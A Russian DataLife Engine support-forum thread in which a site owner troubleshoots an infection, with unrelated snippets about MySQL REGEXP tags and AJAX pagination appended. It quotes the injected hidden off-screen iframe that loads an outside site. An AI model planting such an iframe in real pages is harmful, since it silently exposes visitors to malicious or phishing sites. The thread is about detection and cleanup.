Не нравятся результаты поиска? Попробуйте другой поиск!

DLE FAQ » Все вопросы » Общие вопросы » Редирект в опере 12.17

Редирект в опере 12.17

Бахмут 30.05.2014 Все вопросы » Общие вопросы 3869

вопрос

Здравствуйте! Я уже писал ранее за редирект на одном сайте, увы, никто не нашел, но вот сейчас есть новые данные и может кто-то поможет. С сегодняшнего дня три сайта dle на данном сервере перестали открываться в Опере версии 12.17 (опера старого образца, на новой, версии 21.0 открывается без проблем). Просто показывает белую страницу. При попытке посмотреть исходный код выдает:

<iframe src="http://freeroomhostelz.com/" width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'></iframe></body>
</html>

<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->

Этот фрейм нигде не нашел, хотя стоит Антишел Пафнутия, проверял пол дате замены файлов и т.д. Понятия не имею, где он сидит. Внимание! Во всех остальных браузерах работают сайты нормально! Я решил, что у меня проблемы с оперой, пока не начали жаловаться пользователи. При проверке оказалось, что все, кто жалуется, пользуются старой оперой версии 12.17. Скорее всего причина в не открытии в том, что данный сайт, который в коде во фрейме, сейчас недоступен и каким-то образом старая опера барахлит и не открывает всю страницу. Кто поможет найти фрейм и редирект? Оплата за труд гарантируется. Вот один из пациентов: miniigri.net

Ответил: Бахмут

В общем, так как проблема довольно живо обсуждалась на сайте, я непременно должен отписаться, как она решилась на данный момент.
1. Данный вирус, как я и предполагал, а потом подтвердил уважаемый Sander, не находится на файлах сайта и движка dle, которые располагаются по FTP.
2. Хостерами был прогнан антивирусом весь VPS-сервер - безрезультатно.
3. Проблема решилась после того, как на сервере был обновлен весь софт VPS. Пока двое суток - полет нормальный. Не знаю, вернется проблема или нет, закрыли дыру или нет, но хостеры уверяют, что все VPS обновлено до самой последней версии. Вполне возможно, что обновлением не только убрали шелл, но и закрыли уязвимость.

Всем спасибо за помощь!

29 комментариев

PHP-developer

2583

vitnet - 2015-04-2330 мая 2014 20:33 - #29380

Потому что нормальный скрипт нужно ставить а всякую муть.

Смотрите index.php

Юзер

Бахмут - 2015-04-2330 мая 2014 20:50 - #29381

vitnet, что вы имеете ввиду, под нормальным скриптом? Не ставить DLE? Или вы имели ввиду лицензию? Стоит именно она. Ничего лишнего нет и проверено годами все модули. Файл index.php и .htaccess проверил в первую очередь. Если б было все так легко(((. В общем, жду реальной помощи.

Юзер

Бахмут - 2015-04-2330 мая 2014 21:23 - #29386

Еще один нюанс, в лайвинтернете остановилась статистика посещения сайтов с данной версии браузера примерно в обед. То есть, проблема имеется. Также попробовал в опере поставить настройки "маскироваться мод Mozilla Firefox" и тут же вошел. Чушь какая-то, но не пойму, где искать. Может на VPS сидит(((

Местный

425

Serik - 2015-04-2330 мая 2014 21:35 - #29387

В хроме вредитель не срабатывает, а в старой опере KIS тут же блочит сайт. Где то в php сидит скорее всего. Сливайте весь сайт на комп и врубайте поиск по "freeroomhostelz" в нотепад++

СПАСИБО надо тыкать в кнопку!

Юзер

Бахмут - 2015-04-2330 мая 2014 22:02 - #29388

Serik, уже скачивал и прогонял двумя прогами. Ничего не нашел. Может закодирован как-то. Может кто знает, куда можно обратиться за реальной помощью? Иначе скоро поисковики начнут блочить.
P.S. Искать нужно точно в движке, потому как на этом же сервере вордпресс работает без проблем.

PHP-developer

2583

vitnet - 2015-04-2330 мая 2014 22:27 - #29390

Загляните еще в templates.class.php и *.js

Юзер

Бахмут - 2015-04-2330 мая 2014 22:32 - #29391

vitnet, ничего подозрительного нет. На всякий "пожарный" и файл заменил. Не помогло...

Юзер

301

Kolya groza morey - 2015-04-2330 мая 2014 23:40 - #29393

Бекапы сайта есть?

Юзер

xsash - 2015-04-2330 мая 2014 23:57 - #29395

проблема в том, что со стороны пользователя не особо то и видна проблема.
Вы бы кому из проверенных, ну или пальцем в небо, дали бы доступ к ftp

Юзер

MTFX - 2015-04-2331 мая 2014 00:34 - #29397

аналогичная проблема на многих сайтах ....своих
Дело не в опере
это iframe
перешарил все фтп - так и не нашол! ... подскажите что то ...

Показать / Скрыть текст

Юзер

124

mastodontoff - 2015-04-2331 мая 2014 01:01 - #29398

Может проблема не в сайте, а в вашем компьютере,? Пробывалю друзьям сылочки давать, чтобы они проверили у себя?

Юзер

MTFX - 2015-04-2331 мая 2014 03:01 - #29403

нет это iframe ... к счастью - опера его выявляет а мазилла - нет
Пробовал базу скачать - пробил - в базе нет ссылки - или она зашифрована

к двум часам ночи iframe исчез ... но проблема осталась - так как он вернется.

PHP-developer

3198

dj-avtosh - 2015-04-2331 мая 2014 05:47 - #29413

Очищу за денюшку) а ещё за денюшку помогут обезопаситься))

По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.

PHP-developer

3198

dj-avtosh - 2015-04-2331 мая 2014 05:48 - #29414

И запросите пожалуйста у хостера сразу дрступы к ssh.

Юзер

Бахмут - 2015-04-2331 мая 2014 08:27 - #29417

dj-avtosh, с удовольствием вам заплачу за выполненную работу и доступ к ssh имеется. Но проблема несколько усложнилась. С утра старая опера начала открывать сайты. В исходном коде фрейма не вижу. Скорее всего, как я предполагал ранее, выявить его помог случай, когда вчера данный сайт , указанный во фрейме стал недоступен. Еще я подозреваю, что данный вирус пакостит у меня давненько. Я уже описывал проблему недавно, но так никто и не помог, потому как явно его не видно. Мой предыдущий вопрос на dle-faq. Скачивание всего сайта по FTP, поиск по домену, поиску по слову iframe не помог. Скорее всего действительно сидит на самом VPS. В общем, теперь поймать заразу и проверить, что ее Действительно нет стало несколько сложнее. Возьметесь?

Юзер

Бахмут - 2015-04-2331 мая 2014 10:38 - #29419

Ну в общем, как я предполагал, оперу пускают на сайт. Но время от времени в течении короткого времени идет перенаправление на разные фишинг ресурсы, как я описывал в прошлой теме. dj-avtosh, надеюсь на вашу помощь.

Юзер

Бахмут - 2015-04-2331 мая 2014 11:52 - #29420

... И опять оперу не пускает. Теперь еще и оперу-мини через мобильник.((

Юзер

MTFX - 2015-04-2331 мая 2014 11:55 - #29421

я тоже ищу у себя ... как найду - отпишусь

Юзер

Бахмут - 2015-04-2331 мая 2014 12:01 - #29422

MTFX, спасибо, я тоже с утра в поисках. Сейчас на searchengines попробую найти кого-то. dj-avtosh не в сети скорее всего, на сайтах ужасно упала посещалка с яндекса. Время дорого, скоро будут санкции.

PHP-developer

1783

Sander - 2015-04-2331 мая 2014 12:12 - #29423

Могу помочь.
Мне интересно всякую пакость вычислять :)

SanDev.pro - мой блог.

Telegram: @sandev
Skype: Sander8804

Юзер

Бахмут - 2015-04-2331 мая 2014 12:14 - #29424

Цитата: Sander

Sander

с удовольствием приму вашу помощь! Отпишу сейчас в личку.

PHP-developer

3198

dj-avtosh - 2015-04-2331 мая 2014 13:50 - #29428

если что, я в сети) в аське)

Юзер

Бахмут - 2015-04-2331 мая 2014 14:19 - #29434

В общем, Олег помог найти суть причины и отключил фрейм. Оказалось, что тег </body> заменяется функцией php на этот фрейм. Но не удалил скрипт, который сидит где-то внутри vps. Сейчас работает сисадмин по его нахождению. По результату отпишусь.

Юзер

Бахмут - 2015-04-2331 мая 2014 14:20 - #29435

dj-avtosh, не найдут, я вам тут же отпишусь. Стучал вам ранее, но не было в сети.

PHP-developer

3198

dj-avtosh - 2015-04-2331 мая 2014 14:36 - #29436

вряд ли на впс будет вирус для www))

PHP-developer

1783

Sander - 2015-04-2331 мая 2014 15:08 - #29440

Содержимое файла t.txt

</body>

<?PHP
$t = file_get_contents("t.txt");
echo $t;
?>

В результате будет выведено

<iframe src="http://freeroomhostelz.com/" width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'></iframe></body>

Так что вирус уж точно не в php файлах.

SanDev.pro - мой блог.

Telegram: @sandev
Skype: Sander8804

PHP-developer

3198

dj-avtosh - 2015-04-2331 мая 2014 15:42 - #29443

шелл скрипт пишет php сигнатуры?

PHP-developer

1783

Sander - 2015-04-2331 мая 2014 16:17 - #29446

Как именно это происходит - надеюсь ответит Бахмут, если ему дадут ответ с техподдержки хостинга.
Я не могу объяснить природу работы этого шелла, однако факт остается фактом...

SanDev.pro - мой блог.

Telegram: @sandev
Skype: Sander8804

Юзер

MTFX - 2015-04-2331 мая 2014 16:02 - #29444

выяснился интерестный факт ... 2 разных случая заражения с тем же iframe
в обоих случаях vps моло того - один хостер

mondolfo | Шаблон waitlogin при авторизации через с ...

mondolfo
Шаблон waitlogin при авторизации через соцсеть?
Вчера, 01:31

/engine/modules/social.php
TeraMoune | Как изменить вывод custom по нескольким ... ¹¹

TeraMoune
Как изменить вывод custom по нескольким тегам?
28-10-2024, 01:05

Я же написал, продублирую: нужно использовать [[:punct:]]

И проблема в условии проверяющее версию mysql, можно поменять местами true и false, изменить знак меньше на больше или вовсе убрать код строки с version_compare и оставить ту строку кода $tempArray[] где используется [[:punct:]].

В статье также указано, что важно использовать экранирование, собственно, что и указано в методе по исправлению ошибки.
Статья по решению проблемы

Там у человека совершенно другое условие поиска. Он не теги ищет которые строго разделены запятыми, он просто слова ищет и ему как раз подойдёт граница слова. И это когда-то давно поиск был разделяя по границе слова, теперь есть character_class и используется другой метод. Но это не отменяет того, что вы нашли вопрос и решение которое никак не связано с темой новости поиска новостей с наличием тегов.
homa152 | Как изменить вывод custom по нескольким ... ¹¹

homa152
Как изменить вывод custom по нескольким тегам?
27-10-2024, 23:33

Если вы готовы предложить какое-то решение для исправление проблемы 3685, отлично. Иначе к сожалению на последних версиях MySQL хак не рабочий, согласно вашему трактату.
homa152 | Как изменить вывод custom по нескольким ... ¹¹

homa152
Как изменить вывод custom по нескольким тегам?
27-10-2024, 23:20

Я буквально 2 часа назад столкнулся с проблемами при установке этого хака, проблема была именно в ошибке 3685, сайт не просто переставал работать, использовалась стандартная заглушка при критических ошибках MySQL исправить получилось методом описанным выше, для версия до 8 хак работает исправно, но выше, требуется доработка, так как синтаксис считается ошибочным, вы можете проверить самостоятельно.

В статье также указано, что важно использовать экранирование, собственно, что и указано в методе по исправлению ошибки.
Статья по решению проблемы
TeraMoune | Как изменить вывод custom по нескольким ... ¹¹

TeraMoune
Как изменить вывод custom по нескольким тегам?
27-10-2024, 22:32

Напротив нужно использовать [[:punct:]] вместо скобок, про это написано в документации на которую вы ссылаетесь. А \b означает границу слова и не способен правильно отображать результаты. Граница слова это когда выражение будет находить отдельные слова. Например новость имеет теги (Социальная сеть, Блокировка) и tags REGEXP '\\b(сеть)\\b' найдёт новость с тегом Социальная сеть, а так же Рыбацкая сеть и в принципе найдёт все новости где присутствует слово "Сеть" и будет много лишних результатов, а не только нужные.

В хаке как раз присутствует проверка на старую версию и новую mysql и в каждом случае используется тот вариант который является валидным для используемой версии.
homa152 | Как изменить вывод custom по нескольким ... ¹¹
homa152
Как изменить вывод custom по нескольким тегам?
27-10-2024, 21:30
Добавлю касаемо обновления архитектуры MySQL
При добавлении хака с версии MySQL 8.0, возможно появление ошибки: 3685. Неверный аргумент для регулярного выражения.

Можно пофиксить самостоятельно внеся корректировки в сам хак из панели админа.

Строку:
```
$tempArray[] = "tags REGEXP '[[:<:]](" . $value  . ")[[:>:]]'";
```
Заменить на:
```
$tempArray[] = "tags REGEXP '\\\\b(" . $value  . ")\\\\b'";
```
Согласно справочному руководству MySQL 8.0 / ... / Регулярные выражения, «MySQL поддерживает регулярные выражения с помощью международных компонентов для Unicode (ICU)».

То есть, вместо "[[:<:]] и [[:>:]]", нужно использовать: "\b"
vitnet | Есть ли возможность изменить язык сайта? ¹

vitnet
Есть ли возможность изменить язык сайта?
25-10-2024, 16:22

Ну как вариант можно использовать тег {lang text=***} подробнее

{lang text="LANG_PARAMETER"}

Данный тег предназначен для вывода информации из языкового файла website.tpl, который в данный момент используется, где LANG_PARAMETER это значение параметра, который необходимо вывести. Например, тег {lang text="attach_images"} выведет надпись “Прикрепить изображения” из языкового пакета, в случае использования русского языка и если используется английский язык, то “Attach Images”
vitnet | Есть готовый модуль рейтинга комментарие ... ¹
vitnet
Есть готовый модуль рейтинга комментариев?
25-10-2024, 13:12
Вариант 1 (вручную)

1.0 Открываете файл engine/modules/show.full.php находите в нем
```
$where_approve . " ORDER BY " . PREFIX . "_comments.id " . $comm_msort;
```
И меняете здесь id на rating
Пример:
```
$where_approve . " ORDER BY " . PREFIX . "_comments.rating " . $comm_msort;
```
2.0 Затем переходите в админку /admin.php?mod=options&action=syscon --> Настройки комментариев --> Порядок сортировки комментариев --> По убыванию

2.1 Далее --> Тип рейтинга комментариев выставляете "Нравится или Не нравится"

Готово!

Вариант 2 (плагин)
Для просмотра содержимого спойлера, перейдите к выбранному событию.

Graf | Как сделать аякс кнопку "загрузить еще"? ²

Graf
Как сделать аякс кнопку "загрузить еще"?
23-10-2024, 16:03

Вот рабочий пример со скрытие пагинатора и кнопки.
Полный код файла navigation.tpl

[not-available=userinfo]
<div class="nav-load" id="nav-load">[next-link]Загрузить еще[/next-link]</div>

<nav class="navigation"[available=lastcomments] style="padding: 4% 8%;"[/available]>
	<div class="page_next-prev">
		<span class="page_prev" title="Предыдущая страница">
			[prev-link]<svg class="icon icon-left"><use xlink:href="#icon-left"></use></svg>[/prev-link]
		</span>
		<span class="page_next" title="Следующая страница">
			[next-link]<svg class="icon icon-right"><use xlink:href="#icon-right"></use></svg>[/next-link]
		</span>
	</div>
	<ul class="pagination">
		{pages}
	</ul>
</nav>
<script type="text/javascript">
$(document).ready(function(){
    
         $('body').on('click','#nav-load a',function(){
        var urlNext = $(this).attr('href');
        var scrollNext = $(this).offset().top - 200;
        if (urlNext !== undefined) {
            $.ajax({
                url: urlNext,
                beforeSend: function() {
                    ShowLoading('');
                },            
                success: function(data) {
                    $('.navigation').remove();
                    $('#nav-load').remove();
                    $('#dle-content').append($('#dle-content', data).html());
                    $('#dle-content').after($('#bottom-nav'));
                    window.history.pushState("", "", urlNext);
                    $('html, body').animate({scrollTop:scrollNext}, 800);    
                    HideLoading('');
                },
                  error: function() {                
                    HideLoading('');
                    alert('что-то пошло не так');
                  }
            });
        };
        return false;
    });
    
});
</script>
[/not-available]

vitnet | Как перенести категории в DLE? ²

vitnet
Как перенести категории в DLE?
22-10-2024, 11:30

Для начала проверьте наличие файла /engine/cache/system/category.php и если он был до замены БД то удалите его а ещё лучше очистить кеш.

наверх

Редирект в опере 12.17

Ответил: Бахмут

29 комментариев

Похожие вопросы

Модульные окна DLE в Opera

Проблема с редактированием данных в DLE 9.5

Помогите выявить заразу. Пожалуйста!

Странный редирект на страницу регистрации DLE 9.6

Подцепил вирус - редирект, никак не могу найти. Помогите!

Переезд или редирект страниц

[Вирусы] где могут вставить моб редирект на сайте?

DLE мобильная версия (переход на страницу)?

После обновления до версии 10.3 перестало работать Submenu. В чем проблема?